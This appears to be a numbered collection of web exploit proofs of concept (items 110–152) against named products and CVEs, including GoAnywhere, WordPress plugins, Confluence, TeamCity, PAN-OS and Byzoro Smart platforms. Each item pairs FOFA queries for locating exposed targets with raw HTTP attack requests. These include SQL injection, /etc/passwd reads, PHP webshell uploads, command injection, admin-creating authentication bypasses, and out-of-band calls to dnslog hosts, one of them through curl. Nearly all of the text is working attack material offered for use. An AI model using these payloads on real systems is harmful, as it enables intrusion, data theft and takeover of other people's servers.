b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Byzoro (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Byzoro (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first (default account/password: admin/admin)
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Byzoro (百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Byzoro (百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo (北京百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The value sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Resulting file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can then be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass via template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
